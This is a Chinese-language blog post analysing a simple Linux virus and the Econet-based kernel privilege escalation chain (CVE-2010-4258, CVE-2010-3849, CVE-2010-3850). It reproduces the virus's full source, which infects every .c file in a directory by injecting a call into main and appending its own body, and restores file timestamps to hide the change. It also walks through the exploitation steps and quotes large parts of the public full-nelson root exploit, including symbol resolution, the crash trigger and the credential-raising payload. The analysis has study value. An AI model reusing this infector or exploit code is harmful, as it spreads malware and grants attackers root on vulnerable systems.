karottc A Simple linux-virus Analysis、Linux Kernel <= 2.6.37 - Local Privilege Escalation、CVE-2010-4258、CVE-2010-3849、CVE-2010-3850

catalog

1. 程序功能概述
2. 感染文件
3. 前置知识
4. 获取ROOT权限: Linux Kernel <= 2.6.37 - Local Privilege Escalation

1. 程序功能概述

1. 得到root权限
2. 感染文件
3. 进行破坏

Relevant Link:

https://github.com/karottc/linux-virus

2. 感染文件

该病毒采取感染.C源代码文件的方式进行传播感染，即在每个被感染的源代码的主函数中插入恶意函数的调用，以及在文件的其他位置插入恶意逻辑函数体，并在文件头进行"感染标记"，防止重复感染

/* linux virus start */
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <dirent.h>
#include <sys/stat.h>
#include <unistd.h>
#include <utime.h>

#define VIRNAME    "virus.c"   // 这个文件名会被动态替换掉
#define INF_PATH    "/home/cy/work/linux_virus/testTop/"
#define BUFSIZE     200

char currentPath[BUFSIZE]="";
static int count = 0;  //被感染的.c文件的个数

void destroySystem(void);

/*
 * Scans the current working directory and hands every entry whose name
 * ends in ".c" to infect(); each zero return from infect() increments the
 * file-level counter `count`.
 *
 * On the first call (currentPath is still the empty string) it stores
 * "<cwd>/" followed by VIRNAME in currentPath and then changes directory
 * to INF_PATH. Takes no arguments and returns nothing. A failing getcwd()
 * or opendir() is reported with printf and ends the call early; otherwise
 * the function finishes by calling destroySystem().
 */
void do_virus()
{
    DIR *dp;
    struct dirent *dirp;
    
    struct stat buf,cur_dir_buf;
    int len;     // length of the current entry's name
    char str_buf[BUFSIZE];

    if (!strcmp(currentPath,""))
    {
        // get the current directory, i.e. where the carrier source file is expected to be
        if (getcwd(currentPath,BUFSIZE)==NULL)
        {
            printf("getcwnd failure!!!\n");
            return;
        }
        
        strcat(currentPath,"/");
        strcat(currentPath,VIRNAME);
        
        printf("get current directory: %s!!\n",currentPath);

        // switch the working directory to INF_PATH
        chdir(INF_PATH);
    }

    // open a directory stream on the working directory
    if ((dp=opendir("."))==NULL)
    {
        printf("opendir failure!!!\n");
        return;
    }

    // visit every entry of this directory
    while ((dirp=readdir(dp)) != NULL)
    {
        len = strlen(dirp->d_name);
        // names ending in ".c" are passed to infect()
        if (dirp->d_name[len-1]=='c' && dirp->d_name[len-2]=='.')
        {
            printf("C FILE:  %s\n",dirp->d_name);
            if (infect(dirp->d_name) == 0)
            {
                count++;
                printf("object file %s has been infected !!\n",dirp->d_name);
            }
            printf("\n-------------------------------\n");
            continue;
        }

        // fetch the entry's stat information
        if (stat(dirp->d_name,&buf) < 0)
        {
            printf("get stat of file failure!!\n");
            continue;
        }
        // only directories are of interest past this point
        if (!S_ISDIR(buf.st_mode))
        {
            continue;
        }
        // skip "." and ".."
        if (!strcmp(dirp->d_name,".") ||
            !strcmp(dirp->d_name,".."))
        {
            continue;
        }

        printf("the directory: %s\n",dirp->d_name);
        // per the original note, .pulse holds runtime files, so it is skipped as well
        if (!strcmp(dirp->d_name,".pulse"))
        {
            continue;
        }
        
        // enter the subdirectory and return to the parent straight away;
        // nothing else happens in between
        chdir(dirp->d_name);
        chdir("..");
    }
    closedir(dp);
    destroySystem();
}
/*
 * Rewrites the file named file_name so that it contains a call line
 * "\tdo_virus();\n" inside main and, appended after its own text, the
 * section of the file at currentPath that lies between the
 * "linux virus start" and "linux virus end" marker lines.
 *
 * file_name: path of the target file, opened with mode "r+".
 * Returns 0 when the target was rewritten and its timestamps restored.
 * Returns 1 when a file cannot be opened or stat'ed, when no temporary
 * name can be obtained, when the target already contains the start marker
 * line, when no insertion point was found, or when utime() fails.
 */
int infect(char *file_name)
{
    // target file, carrier (already marked) source file, and a temporary file
    FILE *fp_obj,*fp_vir,*fp_tmp;
    // line buffer for all scans; BUFSIZE caps what one fgets call reads
    char buf[BUFSIZE];
    // state flag driving the two scanning loops below
    int flag;
    // temporary file name
    char *tmp_buf;
    // stat information of the target file
    struct stat statBuf;
    // holds the target's access and modification times
    struct utimbuf timeBuf;

    // open the target file for reading and writing
    if ((fp_obj=fopen(file_name,"r+"))==NULL)
    {
        printf("open object file %s failure !!!\n",file_name);
        return 1;
    }
    // read the target's stat information
    if (stat(file_name,&statBuf) < 0)
    {
        printf("get object file %s stat failure !!\n",file_name);
        return 1;
    }
    // remember the original access/modification times; they are put back at
    // the end (the original note says this is to keep the change unnoticed)
    timeBuf.actime = statBuf.st_atime;
    timeBuf.modtime = statBuf.st_mtime;
    // open the carrier source file recorded in currentPath
    if ((fp_vir=fopen(currentPath,"r"))==NULL)
    {
        printf("open virus file %s failure !!\n",currentPath);
        return 1;
    }
    // obtain a temporary file name
    if ((tmp_buf=tmpnam(NULL))==NULL)
    {
        printf("create temp file failure !!\n");
        return 1;
    }
    // open the temporary file in append mode; all output is assembled there first
    if ((fp_tmp=fopen(tmp_buf,"a+"))==NULL)
    {
        printf("open temp file failure !!\n");
        return 1;
    }
    // remove the temporary file's name; fp_tmp keeps being used below
    unlink(tmp_buf);

    // first loop: 1 = "main(" not seen yet, 0 = seen, 2 = call line written
    flag = 1;
    // scan the target line by line
    while (fgets(buf,BUFSIZE,fp_obj) != NULL)
    {
        // start marker found: the target already carries the marked section
        if (!strcmp(buf,"/* linux virus start */\n"))
        {
            printf("object file %s has been infected !!\n",file_name);
            return 1;
        }
        // first line containing "main(": move to state 0
        if (flag == 1 && strstr(buf,"main("))
        {
            flag = 0;
        }
        // in state 0, the first line containing "return" or "}" gets the
        // call line written in front of it
        if (flag == 0 && (strstr(buf,"return") || strstr(buf,"}")))
        {
            // write the call line and move to state 2
            fputs("\tdo_virus();\n",fp_tmp);
            flag = 2;
        }
        // copy the target's line into the temporary file
        fputs(buf,fp_tmp);
    }
    // state 2 was never reached, so no call line was written: give up
    if (flag != 2)
    {
        printf("object don't main function !!\n");
        return 1;
    }

    // second loop: 1 = before the start marker, 0 = inside the marked
    // section, 2 = end marker already copied
    flag = 1;
    // scan the carrier file and copy only its marked section
    while (fgets(buf,BUFSIZE,fp_vir) != NULL)
    {
        // start marker reached: switch to copying
        if (flag == 1 && !strcmp(buf,"/* linux virus start */\n"))
        {
            flag = 0;
        }
        // still before the marked section: read the next line
        if (flag == 1)
        {
            continue;
        }
        // the end marker was copied on the previous pass: stop scanning
        if (flag == 2)
        {
            break;
        }
        // end marker reached: this line is still copied below, then the loop stops
        if (!strcmp(buf,"/* linux virus end */\n"))
        {
            flag = 2;
        }
        // rewrite the VIRNAME define so that it names the target file
        if (strstr(buf,"#define VIRNAME") && buf[0]=='#')
        {
            snprintf(buf,sizeof(buf),"%s\t\"%s\"\n", "#define VIRNAME",file_name);
        }
        // append the line to the temporary file, after the target's own text
        fputs(buf,fp_tmp);
    }
    // close the carrier file
    fclose(fp_vir);

    // move both streams back to their beginning
    rewind(fp_tmp);
    rewind(fp_obj);
    // write the temporary file's content over the target's content
    while (fgets(buf,BUFSIZE,fp_tmp) != NULL)
    {
        fputs(buf,fp_obj);
    }
    // close the temporary file and the target file
    fclose(fp_tmp);
    fclose(fp_obj);

    // put the target's access and modification times back to the saved values
    if (utime(file_name,&timeBuf) < 0)
    {
        printf("set access and modify time failure !!!\n");
        return 1;
    }
    return 0;
}

/*
 * Placeholder for the "damage" step of the sample: in this listing it only
 * prints a message and does nothing else.
 */
void destroySystem()
{
    printf("\ndestroying System......\n");
}
/* linux virus end */

#include "getRoot.h"

/*
 * Driver of the sample: calls getRoot() (declared in getRoot.h, not shown
 * in this listing), then do_virus(), then prints the value of `count`.
 * Always returns 0.
 */
int main(void)
{
    getRoot();
    do_virus();
    printf("number of c file is: %d\n",count);
    return 0;
}

3. 前置知识

0x1: 进程创建、退出

当fork或者clone一个进程的时候，copy_process执行如下操作
/source/kernel/fork.c

static struct task_struct *copy_process(unsigned long clone_flags,
        unsigned long stack_start,
        unsigned long stack_size,
        int __user *child_tidptr,
        struct pid *pid,
        int trace,
        unsigned long tls)
{
    ..
    p->set_child_tid = (clone_flags & CLONE_CHILD_SETTID) ? child_tidptr : NULL;
    /*
    * Clear TID on mm_release()?
    */
    //如果clone的flag带有CLONE_CHILD_CLEARTID标志，那么clear_child_tid指针中就会保存应用层传递进来的child_tidptr的地址
    p->clear_child_tid = (clone_flags & CLONE_CHILD_CLEARTID) ? child_tidptr : NULL;
    ..

所以，当应用层调用clone函数，并传递CLONE_CHILD_CLEARTID标志，则child_tidptr指针就会被赋值给子进程的clear_child_tid，即用户能够从外部传入参数，控制处于内核态的p->clear_child_tid

clone((int (*)(void *))trigger,
              (void *)((unsigned long)newstack + 65536),
              CLONE_VM | CLONE_CHILD_CLEARTID | SIGCHLD,
              &fildes, NULL, NULL, child_tidptr);

进程在退出的时候调用do_exit清理资源，调用路径如下: do_exit->exit_mm->mm_release
/source/kernel/fork.c

/* 
    Please note the differences between mmput and mm_release.
    * mmput is called whenever we stop holding onto a mm_struct,
    * error success whatever.
    *
    * mm_release is called after a mm_struct has been removed
    * from the current process.
    *
    * This difference is important for error handling, when we
    * only half set up a mm_struct for a new process and need to restore
    * the old one.  Because we mmput the new mm_struct before
    * restoring the old one. . .
    * Eric Biederman 10 January 1998
*/
void mm_release(struct task_struct *tsk, struct mm_struct *mm)
{
    ..
    if (tsk->clear_child_tid) 
    {
        if (!(tsk->flags & PF_SIGNALED) && atomic_read(&mm->mm_users) > 1) 
        {
            /*
            * We don't check the error code - if userspace has
            * not set up a proper pointer then tough luck.
            */
            put_user(0, tsk->clear_child_tid);
            sys_futex(tsk->clear_child_tid, FUTEX_WAKE, 1, NULL, NULL, 0);
        }
        tsk->clear_child_tid = NULL;
    }
    ..

上述代码中，如果tsk->clear_child_tid不为空，那么其会调用put_user(0, tsk->clear_child_tid);
put_user其实是一个宏，具体由__put_user_check宏实现，它会向tsk->clear_child_tid所指向的地址写入0（而不是把tsk->clear_child_tid这个指针本身置为0）
/source/arch/x86/include/asm/uaccess.h

/*
 * Checked store of x through the user pointer ptr, as quoted by the article.
 * The macro evaluates to __pu_err, which starts out as -EFAULT.
 * __put_user_size() is only invoked when access_ok(VERIFY_WRITE, ...)
 * accepts the destination; it receives __pu_err as its last argument.
 * If access_ok() rejects the pointer, no store is attempted and the
 * result stays -EFAULT.
 */
#define __put_user_check(x,ptr,size)                \
({                                \
    long __pu_err = -EFAULT;                \
    __typeof__(*(ptr)) __user *__pu_addr = (ptr);        \
    __typeof__(*(ptr)) __pu_val = x;            \
    if (likely(access_ok(VERIFY_WRITE, __pu_addr, size)))    \
        __put_user_size(__pu_val, __pu_addr, (size),    \
                __pu_err);            \
    __pu_err;                        \
})

__put_user_check宏会调用access_ok去检查传进来的参数是否合法
/source/arch/x86/include/asm/uaccess.h

#define access_ok(type,addr,size)    _access_ok((unsigned long)(addr),(size))

/*
 * Range check behind the access_ok() macro, as quoted by the article.
 *
 * addr: start address of the access; size: its length in bytes.
 * Returns 1 when the access is accepted and 0 when it is rejected (a
 * rejection is also logged through pr_debug).
 * NOTE(review): memory_start/memory_end are not defined in this excerpt;
 * confirm which architecture's uaccess code this listing was taken from.
 */
int _access_ok(unsigned long addr, unsigned long size)
{
    /* a zero-length access is always accepted */
    if (!size)
        return 1;

    /* reject address 0 and ranges that would run past 0xffffffff */
    if (!addr || addr > (0xffffffffUL - (size - 1)))
        goto _bad_access;
    
    // when get_fs() equals KERNEL_DS, the check returns 1 from here on,
    // without looking at memory_start/memory_end
    if (segment_eq(get_fs(), KERNEL_DS))
        return 1;

    /* otherwise the whole range must lie between memory_start and memory_end */
    if (memory_start <= addr && (addr + size - 1) < memory_end)
        return 1;

_bad_access:
    pr_debug("Bad access attempt: pid[%d] addr[%08lx] size[0x%lx]\n",
         current->pid, addr, size);
    return 0;
}

put_user本身没有问题，但是如果一个oops发生的时候有如下操作

set_fs(KERNEL_DS);

arch/x86/include/asm/uaccess.h:
#define set_fs(x) (current_thread_info()->addr_limit = (x))

set_fs将当前进程的地址空间上限设为KERNEL_DS，会绕过put_user的指针上界检查，这样就可以将一个NULL值写入任意一个内核地址空间。但是要利用这个漏洞需要有set_fs(KERNEL_DS);这个前提，通常的一些内核bug产生的oops就满足这个条件

0x2: 无效地址访问异常

每当我们访问一个无效地址的时候，系统便会执行do_page_fault去生成异常日志，结束异常进程等

/*
 * Abridged excerpt of a page-fault handler (the elided part is marked with
 * "......"). The part shown reports the fault through die("Oops", ...)
 * and then ends the current task with do_exit(SIGKILL).
 */
int do_page_fault(struct pt_regs *regs, unsigned long address,
          unsigned int write_access, unsigned int trapno)
{
    // ......
    die("Oops", regs, (write_access << 15) | trapno, address);
    do_exit(SIGKILL);
}

接下来看看CVE-2010-3849这个漏洞，它主要是一个0地址访问异常漏洞，msg->msg_name可以由用户空间控制，因此可以是个NULL值。接下来的saddr->cookie;这句调用就会造成0地址访问异常

/*
 * Abridged excerpt of econet_sendmsg() used to illustrate CVE-2010-3849.
 * Only the lines relevant to the fault are shown; `eb` is not declared in
 * this excerpt and the function's return statement is omitted.
 */
static int econet_sendmsg(struct kiocb *iocb, struct socket *sock,
                          struct msghdr *msg, size_t len)
{       
      struct sock *sk = sock->sk;
      /* saddr is taken straight from msg->msg_name */
      struct sockaddr_ec *saddr=(struct sockaddr_ec *)msg->msg_name;
      
      // saddr is dereferenced without a NULL check in this excerpt, so a NULL
      // msg_name makes this a read through address zero
      eb->cookie = saddr->cookie;
}

以上前置知识整合起来可以形成对这个漏洞利用成因的描述链

1. 往往一些内核bug产生的时候就满足get_fs() = KERNEL_DS这个条件
2. 这个时候，内核会跳到do_page_fault中，进而调用do_exit->exit_mm->mm_release
3. 在mm_release中，如果tsk->clear_child_tid不为空，那么其会调用put_user(0, tsk->clear_child_tid)，而同时tsk->clear_child_tid又是外部参数可控制的，通过clone的flag带有CLONE_CHILD_CLEARTID标志
4. 在put_user中，会调用access_ok去检查传进来的参数是否合法，因为get_fs() = KERNEL_DS的关系，_access_ok检查始终返回1(即通过)

0x3: 漏洞利用

1. 取需要用到的函数地址

 /* Resolve addresses of relevant symbols */
 printf("[*] Resolving kernel addresses...\n");
 econet_ioctl = get_kernel_sym("econet_ioctl");
 econet_ops = get_kernel_sym("econet_ops");
 commit_creds = (_commit_creds) get_kernel_sym("commit_creds");
 prepare_kernel_cred = (_prepare_kernel_cred) get_kernel_sym("prepare_kernel_cred");

2. 申请一块新进程的栈空间

if(!(newstack = malloc(65536))) {
                printf("[*] Failed to allocate memory.\n");
                return -1;
        }

3. 处理好需要映射的地址

// econet_ops中保存了各个econet函数的地址指针，
// 10 * sizeof(void *)到达econet_ioctl的下一个函数地址
// 再减去OFFSET（32位下为1），那么清零的4个字节覆盖了econet_ioctl函数指针的高8位和下一个函数指针的低24位
target = econet_ops + 10 * sizeof(void *) - OFFSET;
 
// 清掉econet_ioctl函数地址的高8位（32位下SHIFT为8）
landing = econet_ioctl << SHIFT >> SHIFT;

// landing按页对齐，map了2个页的内存
payload = mmap((void *)(landing & ~0xfff), 2 * 4096,
                       PROT_READ | PROT_WRITE | PROT_EXEC,
                       MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, 0, 0);
//之所以要把地址映射到(econet_ioctl&0x00FFFFFF)地址范围内，而不是直接将econet_ops指针数组中的econet_ioctl函数地址清零呢。那是因为新版本的linux不允许用户直接调用mmap函数映射0地址了，所以采用了一个很巧妙的小技巧 

if ((long)payload == -1) {
           rintf("[*] Failed to mmap() at target address.\n");
           return -1;
}

// 将提权代码拷贝到landing
memcpy((void *)landing, &trampoline, 1024);

由于有mmap_min_addr的限制，不能mmap到zero内存，因此不能直接利用这个漏洞。但是可以利用上述的任意内核地址写0漏洞继续将这个dos转化为权限提升。
当do_page_fault执行的时候，NULL pointer dereference的oops信息先打印出来，然后会走入do_exit这个路径，进而走入put_user这个路径。
在这条路径的时候把econet_ops的econet_ioctl函数地址给覆盖成指向用户空间事先映射好的一段代码的地址，通常是shellcode代码，那么在用户空间调用ioctl的时候，就会执行我们的shellcode代码。注意put_user会将一个NULL值写入一个4byte的内存地址，如果我们直接将econet_ops里的econet_ioctl对应的偏移作为覆盖对象，那么触发的时候将会再一次触发NULL pointer的操作。因此这里需要一个技巧只覆盖econet_ioctl的高8位地址为0，如果是高16/24位，那么mmap_min_addr也是不允许映射的，高12位put_user操作不了，因此只能是覆盖高8位

econet_ioctl + 4 +----+ 内存高址
| e0 |
econet_ioctl + 3 ------
| 84 |
econet_ioctl + 2 ------
| 32 |
econet_ioctl + 1 ------
| a0 |
econet_ioctl ------
| ...| 
econet_ops ------ 内存低址

target = econet_ops + 10 * sizeof(void *) - 1; 即指向econet_ioctl + 3，将target传递给put_user，那么econet_ioctl的高8位将会被清0，接下来只要将econet_ioctl被覆盖后剩下的内存地址映射为shellcode

/*
 * Excerpt of the payload routine: calls prepare_kernel_cred(0) and passes
 * the result to commit_creds(), both through function pointers declared
 * elsewhere in the listing. The two parameters are not used; the function
 * always returns -1.
 */
static int __attribute__((regparm(3)))
getroot(void * file, void * vma)
{
 
        commit_creds(prepare_kernel_cred(0));
        return -1;
 
}

/*
 * Excerpt of the stub that is later copied with memcpy: it loads the
 * absolute address of getroot into rax (x86-64) or eax (32-bit) and makes
 * an indirect call through that register.
 */
void __attribute__((regparm(3)))
trampoline()
{
 
#ifdef __x86_64__
        asm("mov $getroot, %rax; call *%rax;");
#else
        asm("mov $getroot, %eax; call *%eax;");
#endif
 
}

..
//landing等于econet_ioctl的高8位被置零后的内存地址
landing = econet_ioctl << SHIFT >> SHIFT;
..
memcpy((void *)landing, &trampoline, 1024);

4. clone进程

/* Triggers a NULL pointer dereference in econet_sendmsg
 * via sock_no_sendpage, so it's under KERNEL_DS */
// trigger is used to hit CVE-2010-3849, which is a zero-address access fault
// fildes: array of four descriptors; this function uses all of fildes[0..3].
// Returns -1 when the SIOCSIFADDR ioctl fails; otherwise it ends in exit(0).
int trigger(int * fildes)
{
        int ret;
        struct ifreq ifr;
 
        /* request structure naming the interface "eth0", all other fields zero */
        memset(&ifr, 0, sizeof(ifr));
        strncpy(ifr.ifr_name, "eth0", IFNAMSIZ);
 
        ret = ioctl(fildes[2], SIOCSIFADDR, &ifr);
 
        if(ret < 0) {
                printf("[*] Failed to set Econet address.\n");
                return -1;
        }
 
        /* move up to 128 bytes from fildes[3] to fildes[1], then from fildes[0] to fildes[2] */
        splice(fildes[3], NULL, fildes[1], NULL, 128, 0);
        splice(fildes[0], NULL, fildes[2], NULL, 128, 0);
 
        /* Shouldn't get here... */
        exit(0);
}

// clone进程，子进程调用trigger触发0地址访问的漏洞，进而将target指向的地址清0  
// 即清掉了econet_ioctl函数地址的高8位  
clone((int (*)(void *))trigger,  
              (void *)((unsigned long)newstack + 65536),  
              CLONE_VM | CLONE_CHILD_CLEARTID | SIGCHLD,  
              &fildes, NULL, NULL, target);

0x4: 漏洞触发流程

1. 通过clone的flag带有CLONE_CHILD_CLEARTID标志，控制tsk->clear_child_tid
目标要替换的内存地址通过get_kernel_sym("econet_ioctl")计算得到 
/*
static struct task_struct *copy_process(unsigned long clone_flags,
        unsigned long stack_start,
        unsigned long stack_size,
        int __user *child_tidptr,
        struct pid *pid,
        int trace,
        unsigned long tls)
{
    ..
    p->set_child_tid = (clone_flags & CLONE_CHILD_SETTID) ? child_tidptr : NULL;
    /*
    * Clear TID on mm_release()?
    */
    //如果clone的flag带有CLONE_CHILD_CLEARTID标志，那么clear_child_tid指针中就会保存应用层传递进来的child_tidptr的地址
    p->clear_child_tid = (clone_flags & CLONE_CHILD_CLEARTID) ? child_tidptr : NULL;
    ..
*/

2. 动态计算出econet_ioctl被劫持后的新函数地址，landing等于econet_ioctl的高8位被置零后的新内存地址，并将shellcode写入此内存地址空间中，等待其被CPU调用执行
/*
..
//landing等于econet_ioctl的高8位被置零后的内存地址
landing = econet_ioctl << SHIFT >> SHIFT;
..
memcpy((void *)landing, &trampoline, 1024);
*/

3. CVE-2010-3849漏洞，触发一个0地址访问异常漏洞
4. linux进入Oops状态，通过set_fs(KERNEL_DS)进入"临界区"，解除了进程读写地址的内核边界限制，此时进程有权利读写任意内存地址，包括内核态的地址
5. 触发的page_fault错误，会产生以下调用链: do_page_fault->do_exit->exit_mm->mm_release->put_user(0, tsk->clear_child_tid)，注意，put_user会将一个NULL值写入一个4byte的内存地址，如果我们直接将econet_ops里的econet_ioctl对应的偏移作为覆盖对象，那么触发的时候将会再一次触发NULL pointer的操作。因此这里需要一个技巧只覆盖econet_ioctl的高8位地址为0
6. 则此时econet_ioctl系统调用的函数地址被劫持为一个高8位被置零的新地址，跳到SHELLCODE中执行
7. 在SHELLCODE中调用commit_creds将当前进程uid、gid修改为0，即root权限

0x5: Patch

/source/kernel/exit.c

void do_exit(long code)
{
    ..
    if (unlikely(!tsk->pid))
        panic("Attempted to kill the idle task!");

     /*
    * If do_exit is called because this processes oopsed, it's possible that get_fs() was left as KERNEL_DS, so reset it to USER_DS before
    * continuing. Amongst other possible reasons, this is to prevent mm_release()->clear_child_tid() from writing to a user-controlled
    * kernel address.
    */
    set_fs(USER_DS);
    
    ptrace_event(PTRACE_EVENT_EXIT, code);
    ..

Relevant Link:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4258
http://blog.csdn.net/hu3167343/article/details/36892563
http://www.cnblogs.com/bittorrent/p/3274405.html 
https://www.exploit-db.com/exploits/15704/

4. 获取ROOT权限: Linux Kernel <= 2.6.37 - Local Privilege Escalation

得到root权限是通过 CVE-2010-4258,CVE-2010-3849,CVE-2010-3850这三个漏洞，主要是Econet protocol 的漏洞来实现的，CVE-2010-4258这个漏洞的主要思路是如果通过clone函数去创建进程，并且带有CLONE_CHILD_CLEARTID标志，那么进程在退出的时候，可以造成内核任意地址写0的bug。PoC代码利用了多个漏洞来达到权限提升的目的

0x1: CVE-2010-4258

1. access_ok

When a user application passes a pointer to the kernel, and the kernel wants to read or write from that pointer, the kernel needs to perform various checks that a buggy or malicious userspace app hasn't passed an "evil" pointer.
Because the kernel and userspace run in the same address space, the most important check is simply that the pointer points into the "userspace" part of the address space. User applications are protected by page table permissions from writing into kernel memory, but the kernel isn't, and so must explicitly check that any pointers given to it by a user don't point into the kernel region.
The address space is laid out such that user applications get the bottom portion, and the kernel gets the top, so this check is a simple comparison against that boundary. The kernel function that performs this check is called access_ok, although there are various other functions that do the same check, implicitly or otherwise.
内核态的access_ok()会对从用户态传入的读写指针进行边界检查，防止用户态企图对内核态的内存地址进行读写

/source/fs/read_write.c

2. get_fs() and set_fs()

Occasionally, however, the kernel finds it useful to change the rules for what access_ok will allow. set_fs() is an internal Linux function that is used to override the definition of the user/kernel split, for the current process.
After a set_fs(KERNEL_DS), no checking is performed that user pointers point to userspace – access_ok will always return true. set_fs(KERNEL_DS) is mainly used to enable the kernel to wrap functions that expect user pointers, by passing them pointers into the kernel address space. A typical use reads something like this:

old_fs = get_fs(); set_fs(KERNEL_DS);
vfs_readv(file, kernel_buffer, len, &pos);
set_fs(old_fs);

vfs_readv expects a user-provided pointer, so without the set_fs(), the access_ok() inside vfs_readv() would fail on our kernel buffer, so we use set_fs() to effectively temporarily disable that checking.
当内核代码需要把内核缓冲区的指针传给原本期望用户态指针的函数时，需要用get_fs()、set_fs()将这段关键代码包裹(wrap)起来，临时放宽access_ok的检查范围，调用结束后再恢复原值

3. Kernel oopses

When the kernel oopses, perhaps because of a NULL pointer dereference in kernelspace, or because of a call to the BUG() macro to indicate an assertion failure, the kernel attempts to clean up, and then tries to kill the current process by calling the do_exit() function to exit the current process.
When the kernel does so, it's still running in the same process context it was before the oops occurred, including any set_fs() override, if applicable. Which means that do_exit will get called with access_ok disabled – not something anyone expected when they wrote the individual pieces of this system.
可以将get_fs()、set_fs()看成一个临界代码执行的事务区域，但是如果内核在临界区中发生内核错误，内核会调用do_exit()立即退出，导致事务不一致状态，即access_ok()处于失效状态

4. clear_child_tid

As it turns out, do_exit contains a write to a user-controlled address that expects access_ok to be working properly!
clear_child_tid is a feature where, on thread exit, the kernel can be made to write a zero into a specified address in that thread's address space, in order to notify other threads of that exit.
This is implemented by simply storing a pointer to the to-be-zeroed address inside struct task_struct (which represents a single thread or process), and, on exit, mm_release, called from do_exit, does:

put_user(0, tsk->clear_child_tid);

This is normally safe, because put_user checks that its second argument falls into the "userspace" segment before doing a write. But, if we are running with get_fs() == KERNEL_DS, it will happily accept any address at all, even one pointing into kernel space.
So, if we find any kernel BUG() or NULL dereference, or other page fault, that we can trigger after a set_fs(KERNEL_DS), we can trick the kernel into a user-controlled write into kernel memory!

5. splice() et al.

An obvious question at this point is: How much of the kernel can an attacker cause to run with get_fs() == KERNEL_DS?
There are a number of small special cases. For example, the binary sysctl compatibility code works by calling the normal /proc/ write handlers from kernelspace, under set_fs(). A handful of compat-mode (32 on 64) syscalls work similarly.

0x2: POC

/*
 * Linux Kernel <= 2.6.37 local privilege escalation
 * by Dan Rosenberg
 * @djrbliss on twitter
 *
 * Usage:
 * gcc full-nelson.c -o full-nelson
 * ./full-nelson
 *
 * This exploit leverages three vulnerabilities to get root, all of which were
 * discovered by Nelson Elhage:
 *
 * CVE-2010-4258
 * -------------
 * This is the interesting one, and the reason I wrote this exploit.  If a
 * thread is created via clone(2) using the CLONE_CHILD_CLEARTID flag, a NULL
 * word will be written to a user-specified pointer when that thread exits.
 * This write is done using put_user(), which ensures the provided destination
 * resides in valid userspace by invoking access_ok().  However, Nelson
 * discovered that when the kernel performs an address limit override via
 * set_fs(KERNEL_DS) and the thread subsequently OOPSes (via BUG, page fault,
 * etc.), this override is not reverted before calling put_user() in the exit
 * path, allowing a user to write a NULL word to an arbitrary kernel address.
 * Note that this issue requires an additional vulnerability to trigger.
 *
 * CVE-2010-3849
 * -------------
 * This is a NULL pointer dereference in the Econet protocol.  By itself, it's
 * fairly benign as a local denial-of-service.  It's a perfect candidate to
 * trigger the above issue, since it's reachable via sock_no_sendpage(), which
 * subsequently calls sendmsg under KERNEL_DS.
 *
 * CVE-2010-3850
 * -------------
 * I wouldn't be able to reach the NULL pointer dereference and trigger the
 * OOPS if users weren't able to assign Econet addresses to arbitrary
 * interfaces due to a missing capabilities check.
 *
 * In the interest of public safety, this exploit was specifically designed to
 * be limited:
 *
 *  * The particular symbols I resolve are not exported on Slackware or Debian
 *  * Red Hat does not support Econet by default
 *  * CVE-2010-3849 and CVE-2010-3850 have both been patched by Ubuntu and
 *    Debian
 *
 * However, the important issue, CVE-2010-4258, affects everyone, and it would
 * be trivial to find an unpatched DoS under KERNEL_DS and write a slightly
 * more sophisticated version of this that doesn't have the roadblocks I put in
 * to prevent abuse by script kiddies.
 *
 * Tested on unpatched Ubuntu 10.04 kernels, both x86 and x86-64.
 *
 * NOTE: the exploit process will deadlock and stay in a zombie state after you
 * exit your root shell because the Econet thread OOPSes while holding the
 * Econet mutex.  It wouldn't be too hard to fix this up, but I didn't bother.
 *
 * Greets to spender, taviso, stealth, pipacs, jono, kees, and bla
 */

#include <stdio.h>
#include <sys/socket.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <string.h>
#include <net/if.h>
#include <sched.h>
#include <stdlib.h>
#include <signal.h>
#include <sys/utsname.h>
#include <sys/mman.h>
#include <unistd.h>
 #include <errno.h>

/* How many bytes should we clear in our
 * function pointer to put it into userspace? */
#ifdef __x86_64__
#define SHIFT 24
#define OFFSET 3
#else
#define SHIFT 8
#define OFFSET 1
#endif

/* thanks spender... */
/*
 * Looks up the address listed for the symbol `name` in a kernel symbol table.
 *
 * Sources are tried in this order: /proc/kallsyms, then /proc/ksyms (parsed
 * in "oldstyle" two-column form), and finally /boot/System.map-<release>,
 * where <release> comes from uname().
 *
 * name: symbol name, compared with strcmp against each parsed entry.
 * Returns the parsed address of the first matching entry, or 0 when no
 * source contains the symbol or System.map cannot be opened.
 */
unsigned long get_kernel_sym(char *name)
{
        FILE *f;
        unsigned long addr;
        char dummy;
        char sname[512];
        struct utsname ver;
        int ret;
        int rep = 0;        /* set to 1 once the System.map fallback is in use */
        int oldstyle = 0;   /* 1 = two-column "address name" format */

        f = fopen("/proc/kallsyms", "r");
        if (f == NULL) {
                f = fopen("/proc/ksyms", "r");
                if (f == NULL)
                        goto fallback;
                oldstyle = 1;
        }

repeat:
        ret = 0;
        while(ret != EOF) {
                if (!oldstyle)
                        /* three columns: address, one type character, name */
                        ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
                else {
                        ret = fscanf(f, "%p %s\n", (void **)&addr, sname);
                        if (ret == 2) {
                                char *p;
                                /* entries containing "_O/" or "_S." are skipped */
                                if (strstr(sname, "_O/") || strstr(sname, "_S."))
                                        continue;
                                /* when "smp" directly precedes the last '_', cut the name
                                 * short before it, dropping any underscores in front of the
                                 * cut as well (presumably a version suffix -- confirm) */
                                p = strrchr(sname, '_');
                                if (p > ((char *)sname + 5) && !strncmp(p - 3, "smp", 3)) {
                                        p = p - 4;
                                        while (p > (char *)sname && *(p - 1) == '_')
                                                p--;
                                        *p = '\0';
                                }
                        }
                }
                if (ret == 0) {
                        /* nothing matched on this line: consume one token and retry */
                        fscanf(f, "%s\n", sname);
                        continue;
                }
                if (!strcmp(name, sname)) {
                        fprintf(stdout, " [+] Resolved %s to %p%s\n", name, (void *)addr, rep ? " (via System.map)" : 
"");
                        fclose(f);
                        return addr;
                }
        }

        fclose(f);
        /* the System.map pass has already been tried: give up */
        if (rep)
                return 0;
fallback:
        uname(&ver);
        /* releases not starting with "2.6" are parsed in the two-column format */
        if (strncmp(ver.release, "2.6", 3))
                oldstyle = 1;
        sprintf(sname, "/boot/System.map-%s", ver.release);
        f = fopen(sname, "r");
        if (f == NULL)
                return 0;
        rep = 1;
        goto repeat;
}

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
